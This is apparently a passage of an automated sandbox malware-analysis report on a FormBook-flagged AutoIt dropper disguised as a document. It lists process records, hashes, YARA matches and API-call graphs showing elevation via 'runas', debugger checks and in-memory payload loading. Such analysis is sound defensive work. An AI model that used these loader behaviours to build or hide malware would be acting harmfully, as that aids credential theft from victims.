                                                                                                                                  Path:C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe"
                                                                                                                                  Imagebase:0xc20000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:16:56:35
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                  Imagebase:0x7ff79f9e0000
                                                                                                                                  File size:676'768 bytes
                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true


                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:2.9%
                                                                                                                                    Dynamic/Decrypted Code Coverage:2.4%
                                                                                                                                    Signature Coverage:3.9%
                                                                                                                                    Total number of Nodes:1416
                                                                                                                                    Total number of Limit Nodes:35
                                                                                                                                    execution_graph 84704 4444e4 84709 40d900 84704->84709 84706 4444ee 84713 43723d 84706->84713 84708 444504 84710 40d917 84709->84710 84711 40d909 84709->84711 84710->84711 84712 40d91c CloseHandle 84710->84712 84711->84706 84712->84706 84714 40d900 CloseHandle 84713->84714 84715 437247 ctype 84714->84715 84715->84708 84978 40f110 RegOpenKeyExW 84979 40f13c RegQueryValueExW RegCloseKey 84978->84979 84980 40f15f 84978->84980 84979->84980 84981 429212 84986 410b90 84981->84986 84984 411421 __cinit 74 API calls 84985 42922f 84984->84985 84987 410b9a __write_nolock 84986->84987 84988 41171a 75 API calls 84987->84988 84989 410c31 GetModuleFileNameW 84988->84989 85003 413db0 84989->85003 84991 410c66 _wcsncat 85006 413e3c 84991->85006 84994 41171a 75 API calls 84995 410ca3 _wcscpy 84994->84995 84996 410cd1 RegOpenKeyExW 84995->84996 84997 429bc3 RegQueryValueExW 84996->84997 84998 410cf7 84996->84998 84999 429cd9 RegCloseKey 84997->84999 85000 429bf2 _wcscat _wcslen _wcsncpy 84997->85000 84998->84984 85001 41171a 75 API calls 85000->85001 85002 429cd8 85000->85002 85001->85000 85002->84999 85009 413b95 85003->85009 85039 41abec 85006->85039 85010 413c2f 85009->85010 85015 413bae 85009->85015 85011 413d60 85010->85011 85012 413d7b 85010->85012 85035 417f23 67 API calls __getptd_noexit 85011->85035 85037 417f23 67 API calls __getptd_noexit 85012->85037 85015->85010 85025 413c1d 85015->85025 85031 41ab19 67 API calls __fptostr 85015->85031 85016 413d65 85021 413cfb 85016->85021 85036 417ebb 6 API calls 2 library calls 85016->85036 85019 413d03 85019->85010 85019->85021 85023 413d8e 85019->85023 85020 413cb9 85020->85010 85022 413cd6 85020->85022 85033 41ab19 67 API calls __fptostr 85020->85033 85021->84991 85022->85010 85022->85021 85027 413cef 85022->85027 85038 41ab19 67 API calls __fptostr 85023->85038 85025->85010 85030 413c9b 85025->85030 
86422 43717f 110 API calls _printf 86398->86422 86400 42ca6c 86400->86394 86401 42ccc3 86402 413a88 __output_l 67 API calls 86401->86402 86403 42cccd 86402->86403 86404 434fe1 106 API calls 86403->86404 86405 42ccda 86404->86405 86409 401b70 75 API calls 86409->86412 86412->86401 86412->86409 86413 402cc0 75 API calls 2 library calls 86412->86413 86414 4026a0 86412->86414 86423 445051 75 API calls _memcpy_s 86412->86423 86424 44c80c 87 API calls 3 library calls 86412->86424 86425 44b408 75 API calls 86412->86425 86413->86412 86415 4026af 86414->86415 86418 40276b 86414->86418 86416 41171a 75 API calls 86415->86416 86417 4026ee ctype 86415->86417 86415->86418 86416->86417 86417->86418 86419 41171a 75 API calls 86417->86419 86418->86412 86419->86417 86420->86392 86421->86393 86422->86400 86423->86412 86424->86412 86425->86412 86426->85590 86427->85591 86429 401bfb 86428->86429 86449 401cde 86428->86449 86430 4013a0 75 API calls 86429->86430 86431 401c0b 86430->86431 86432 42a9a0 LoadStringW 86431->86432 86433 401c18 86431->86433 86435 42a9bb 86432->86435 86434 4021e0 75 API calls 86433->86434 86436 401c2d 86434->86436 86452 40df50 75 API calls 86435->86452 86438 401c3a 86436->86438 86439 42a9cd 86436->86439 86438->86435 86440 401c44 86438->86440 86453 40d3b0 75 API calls 2 library calls 86439->86453 86451 40d3b0 75 API calls 2 library calls 86440->86451 86443 42a9dc 86444 42a9f0 86443->86444 86446 401c53 _memset _wcscpy _wcsncpy 86443->86446 86454 40d3b0 75 API calls 2 library calls 86444->86454 86448 401cc2 Shell_NotifyIconW 86446->86448 86447 42a9fe 86448->86449 86449->85602 86450->85596 86451->86446 86452->86446 86453->86443 86454->86447 84716 444343 84719 444326 84716->84719 84718 44434e WriteFile 84720 444340 84719->84720 84721 4442c7 84719->84721 84720->84718 84726 40e190 SetFilePointerEx 84721->84726 84723 4442e0 SetFilePointerEx 84727 40e190 SetFilePointerEx 84723->84727 84725 4442ff 84725->84718 84726->84723 84727->84725 84728 46d22f 84731 46d098 
84728->84731 84730 46d241 84732 46d0b5 84731->84732 84733 46d115 84732->84733 84734 46d0b9 84732->84734 84798 45c216 78 API calls 84733->84798 84775 41171a 84734->84775 84737 46d126 84739 46d0f8 84737->84739 84746 46d142 84737->84746 84794 4092c0 84739->84794 84740 46d0cc 84788 453063 84740->84788 84744 46d0fd 84744->84730 84747 46d1c8 84746->84747 84749 46d158 84746->84749 84808 4676a3 78 API calls 84747->84808 84753 453063 111 API calls 84749->84753 84750 46d0ea 84750->84746 84754 46d0ee 84750->84754 84752 46d1ce 84809 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84752->84809 84762 46d15e 84753->84762 84754->84739 84793 44ade5 CloseHandle ctype 84754->84793 84755 46d18d 84799 467fce 82 API calls 84755->84799 84759 46d196 84800 4013a0 84759->84800 84760 46d1e7 84764 4092c0 VariantClear 84760->84764 84773 46d194 84760->84773 84762->84755 84762->84759 84764->84773 84766 46d1ac 84806 40d3b0 75 API calls 2 library calls 84766->84806 84768 46d224 84768->84730 84769 46d1b8 84807 467fce 82 API calls 84769->84807 84770 40d900 CloseHandle 84772 46d216 84770->84772 84810 44ade5 CloseHandle ctype 84772->84810 84773->84768 84773->84770 84777 411724 84775->84777 84778 41173e 84777->84778 84782 411740 std::bad_alloc::bad_alloc 84777->84782 84811 4138ba 84777->84811 84829 411afc 6 API calls __decode_pointer 84777->84829 84778->84740 84787 40d940 76 API calls 84778->84787 84780 411766 84833 4116fd 67 API calls std::exception::exception 84780->84833 84782->84780 84830 411421 84782->84830 84783 411770 84834 41805b RaiseException 84783->84834 84786 41177e 84787->84740 84789 45306e 84788->84789 84790 45307a 84788->84790 84789->84790 84972 452e2a 111 API calls 5 library calls 84789->84972 84792 40dfa0 83 API calls 84790->84792 84792->84750 84793->84739 84795 4092c8 ctype 84794->84795 84796 429db0 VariantClear 84795->84796 84797 4092d5 ctype 84795->84797 84796->84797 84797->84744 84798->84737 84799->84773 84801 41171a 75 API calls 84800->84801 84802 4013c4 84801->84802 84973 
401380 84802->84973 84805 40df50 75 API calls 84805->84766 84806->84769 84807->84773 84808->84752 84809->84760 84810->84768 84812 41396d 84811->84812 84813 4138cc 84811->84813 84842 411afc 6 API calls __decode_pointer 84812->84842 84815 4138dd 84813->84815 84821 413965 84813->84821 84822 413929 RtlAllocateHeap 84813->84822 84824 413959 84813->84824 84827 41395e 84813->84827 84838 41386b 67 API calls 4 library calls 84813->84838 84839 411afc 6 API calls __decode_pointer 84813->84839 84815->84813 84835 418252 67 API calls 2 library calls 84815->84835 84836 4180a7 67 API calls 7 library calls 84815->84836 84837 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84815->84837 84816 413973 84843 417f23 67 API calls __getptd_noexit 84816->84843 84821->84777 84822->84813 84840 417f23 67 API calls __getptd_noexit 84824->84840 84841 417f23 67 API calls __getptd_noexit 84827->84841 84829->84777 84844 4113e5 84830->84844 84832 41142e 84832->84780 84833->84783 84834->84786 84835->84815 84836->84815 84838->84813 84839->84813 84840->84827 84841->84821 84842->84816 84843->84821 84845 4113f1 __locking 84844->84845 84852 41181b 84845->84852 84851 411412 __locking 84851->84832 84878 418407 84852->84878 84854 4113f6 84855 4112fa 84854->84855 84943 4169e9 TlsGetValue 84855->84943 84858 4169e9 __decode_pointer 6 API calls 84859 41131e 84858->84859 84860 4113a1 84859->84860 84953 4170e7 68 API calls 5 library calls 84859->84953 84875 41141b 84860->84875 84862 41133c 84865 411357 84862->84865 84866 411366 84862->84866 84874 411388 84862->84874 84863 41696e __encode_pointer 6 API calls 84864 411396 84863->84864 84867 41696e __encode_pointer 6 API calls 84864->84867 84954 417047 73 API calls _realloc 84865->84954 84866->84860 84869 411360 84866->84869 84867->84860 84869->84866 84872 41137c 84869->84872 84955 417047 73 API calls _realloc 84869->84955 84871 411376 84871->84860 84871->84872 84956 41696e TlsGetValue 84872->84956 84874->84863 84968 411824 84875->84968 84879 
41841c 84878->84879 84880 41842f EnterCriticalSection 84878->84880 84885 418344 84879->84885 84880->84854 84882 418422 84882->84880 84913 4117af 67 API calls 3 library calls 84882->84913 84884 41842e 84884->84880 84886 418350 __locking 84885->84886 84887 418360 84886->84887 84888 418378 84886->84888 84914 418252 67 API calls 2 library calls 84887->84914 84894 418386 __locking 84888->84894 84917 416fb6 84888->84917 84890 418365 84915 4180a7 67 API calls 7 library calls 84890->84915 84894->84882 84895 41836c 84916 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84895->84916 84896 4183a7 84898 418407 __lock 67 API calls 84896->84898 84897 418398 84923 417f23 67 API calls __getptd_noexit 84897->84923 84901 4183ae 84898->84901 84903 4183e2 84901->84903 84904 4183b6 84901->84904 84906 413a88 __output_l 67 API calls 84903->84906 84924 4189e6 InitializeCriticalSectionAndSpinCount __locking 84904->84924 84908 4183d3 84906->84908 84907 4183c1 84907->84908 84925 413a88 84907->84925 84939 4183fe LeaveCriticalSection _doexit 84908->84939 84911 4183cd 84938 417f23 67 API calls __getptd_noexit 84911->84938 84913->84884 84914->84890 84915->84895 84920 416fbf 84917->84920 84918 4138ba _malloc 66 API calls 84918->84920 84919 416ff5 84919->84896 84919->84897 84920->84918 84920->84919 84921 416fd6 Sleep 84920->84921 84922 416feb 84921->84922 84922->84919 84922->84920 84923->84894 84924->84907 84926 413a94 __locking 84925->84926 84927 413ad3 84926->84927 84928 413b0d __locking __dosmaperr 84926->84928 84930 418407 __lock 65 API calls 84926->84930 84927->84928 84929 413ae8 RtlFreeHeap 84927->84929 84928->84911 84929->84928 84931 413afa 84929->84931 84932 413aab ___sbh_find_block 84930->84932 84942 417f23 67 API calls __getptd_noexit 84931->84942 84937 413ac5 84932->84937 84940 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __fptostr 84932->84940 84934 413aff GetLastError 84934->84928 84941 413ade LeaveCriticalSection _doexit 84937->84941 84938->84908 
84939->84894 84940->84937 84941->84927 84942->84934 84944 416a01 84943->84944 84945 416a22 GetModuleHandleW 84943->84945 84944->84945 84948 416a0b TlsGetValue 84944->84948 84946 416a32 84945->84946 84947 416a3d GetProcAddress 84945->84947 84966 41177f Sleep GetModuleHandleW 84946->84966 84950 41130e 84947->84950 84952 416a16 84948->84952 84950->84858 84951 416a38 84951->84947 84951->84950 84952->84945 84952->84950 84953->84862 84954->84869 84955->84871 84957 4169a7 GetModuleHandleW 84956->84957 84958 416986 84956->84958 84959 4169c2 GetProcAddress 84957->84959 84960 4169b7 84957->84960 84958->84957 84961 416990 TlsGetValue 84958->84961 84963 41699f 84959->84963 84967 41177f Sleep GetModuleHandleW 84960->84967 84965 41699b 84961->84965 84963->84874 84964 4169bd 84964->84959 84964->84963 84965->84957 84965->84963 84966->84951 84967->84964 84971 41832d LeaveCriticalSection 84968->84971 84970 411420 84970->84851 84971->84970 84972->84790 84974 41171a 75 API calls 84973->84974 84975 401387 84974->84975 84975->84805 86455 42919b 86460 40ef10 86455->86460 86458 411421 __cinit 74 API calls 86459 4291aa 86458->86459 86461 41171a 75 API calls 86460->86461 86462 40ef17 86461->86462 86463 42ad48 86462->86463 86468 40ef40 74 API calls __cinit 86462->86468 86465 40ef2a 86469 40e470 86465->86469 86468->86465 86470 40c060 75 API calls 86469->86470 86471 40e483 GetVersionExW 86470->86471 86472 4021e0 75 API calls 86471->86472 86473 40e4bb 86472->86473 86495 40e600 86473->86495 86479 42accc 86481 42ad28 GetSystemInfo 86479->86481 86485 42ad38 GetSystemInfo 86481->86485 86482 40e557 GetCurrentProcess 86515 40ee30 LoadLibraryA GetProcAddress 86482->86515 86483 40e56c 86483->86485 86508 40eee0 86483->86508 86488 40e5c9 86512 40eea0 86488->86512 86491 40e5e0 86493 40e5f1 FreeLibrary 86491->86493 86494 40e5f4 86491->86494 86492 40e5dd FreeLibrary 86492->86491 86493->86494 86494->86458 86496 40e60b 86495->86496 86497 40c740 75 API calls 86496->86497 86498 40e4c2 86497->86498 86499 40e620 
86498->86499 86500 40e62a 86499->86500 86501 42ac93 86500->86501 86502 40c740 75 API calls 86500->86502 86503 40e4ce 86502->86503 86503->86479 86504 40ee70 86503->86504 86505 40e551 86504->86505 86506 40ee76 LoadLibraryA 86504->86506 86505->86482 86505->86483 86506->86505 86507 40ee87 GetProcAddress 86506->86507 86507->86505 86509 40e5bf 86508->86509 86510 40eee6 LoadLibraryA 86508->86510 86509->86481 86509->86488 86510->86509 86511 40eef7 GetProcAddress 86510->86511 86511->86509 86516 40eec0 LoadLibraryA GetProcAddress 86512->86516 86514 40e5d3 GetNativeSystemInfo 86514->86491 86514->86492 86515->86483 86516->86514 86517 3f94400 86518 3f92050 GetPEB 86517->86518 86519 3f944a5 86518->86519 86531 3f942f0 86519->86531 86521 3f944ce CreateFileW 86523 3f94522 86521->86523 86525 3f9451d 86521->86525 86524 3f94539 VirtualAlloc 86523->86524 86523->86525 86524->86525 86526 3f94557 ReadFile 86524->86526 86526->86525 86527 3f94572 86526->86527 86528 3f932f0 13 API calls 86527->86528 86529 3f945a5 86528->86529 86530 3f945c8 ExitProcess 86529->86530 86530->86525 86532 3f942f9 Sleep 86531->86532 86533 3f94307 86532->86533 84976 40116e 84977 401119 DefWindowProcW 84976->84977

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                                      • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Doc 784-01965670.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                                                      • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                                                    • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Doc 784-01965670.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                                      • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\Doc 784-01965670.exe,00000004), ref: 0040D7D6
                                                                                                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\Doc 784-01965670.exe,00000004), ref: 00431B0E
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,00000004), ref: 00431B3F
                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                                    • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                                      • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                      • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                      • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                      • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                      • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                      • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                      • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                      • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                      • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                      • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                      • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                      • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                                      • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                                    • String ID: @GH$@GH$C:\Users\user\Desktop\Doc 784-01965670.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                    • API String ID: 2493088469-1118522121
                                                                                                                                    • Opcode ID: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                                    • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                                    • Opcode Fuzzy Hash: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                                    • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                                                    • String ID: pMH
                                                                                                                                    • API String ID: 2923339712-2522892712
                                                                                                                                    • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                    • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                                    • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                    • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                    • API String ID: 2574300362-3542929980
                                                                                                                                    • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                    • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                                    • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                    • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                                    • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                    • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                                    • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                                      • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                                    • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                                    • _wcscat.LIBCMT ref: 00429C43
                                                                                                                                    • _wcslen.LIBCMT ref: 00429C55
                                                                                                                                    • _wcslen.LIBCMT ref: 00429C66
                                                                                                                                    • _wcscat.LIBCMT ref: 00429C80
                                                                                                                                    • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                                    • API String ID: 1004883554-2276155026
                                                                                                                                    • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                                    • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                                    • Opcode Fuzzy Hash: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                                    • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                    • String ID: FILE
                                                                                                                                    • API String ID: 3888824918-3121273764
                                                                                                                                    • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                    • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                                    • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
